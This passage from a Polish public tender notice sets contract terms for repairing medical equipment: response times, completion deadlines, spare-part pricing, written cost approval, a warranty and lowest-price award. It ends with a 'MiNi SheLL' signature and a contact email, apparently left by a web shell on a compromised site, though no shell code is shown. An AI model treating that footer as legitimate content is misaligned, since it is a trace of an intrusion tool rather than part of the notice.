6. Świadczenie usług odbywać się będzie na podstawie pisemnych zleceń, zgłoszenia telefonicznego lub e-mailem.
7. Wykonawca zobowiązany będzie do bezpłatnego telefonicznego udzielania porad w zakresie objętym zamówieniem.
8. Wykonawca będzie utrzymywał gotowość do świadczenia usług w jednostkach zamawiającego w godzinach od 7:30 do 15.30 od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy.
9. Termin wykonania usługi: do 7 dni roboczych od daty zgłoszenia/przekazania zlecenia.
10. Czas reakcji (przybycia) pracowników wykonawcy na zgłoszoną potrzebę wykonania usługi wynosi: do 3 godzin licząc od chwili zgłoszenia/przekazania zlecenia.
11. Przed przystąpieniem do wykonania usługi pracownik wykonawcy oszacuje wartość usługi (na podstawie ceny 1 roboczogodziny oraz cen części zamiennych koniecznych do wykonania naprawy) i przedstawi ją zamawiającemu. Części zamienne muszą być oryginalne i techniczne nowe.
12. Ceny części  zamiennych wykonawca skalkuluje zgodnie ze swoim cennikiem obowiązującym na dzień sporządzenia kalkulacji. W przypadku, gdy ceny części zamiennych będą wyższe od cen rynkowych, zamawiający może dokonać zakupu niezbędnych części we własnym zakresie. 
13. Pracownik wykonawcy przystąpi do świadczenia usług wyłącznie po pisemnym zaakceptowaniu oszacowanej wartości usługi przez jednostkę zamawiającego.
14. Wykonawca zobowiązany będzie do wykonania usługi z należytą starannością w sposób zgodny z aktualną wiedzą techniczną.
15. Wykonawca udzieli gwarancji na dokonaną naprawę urządzeń na okres min. 6 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com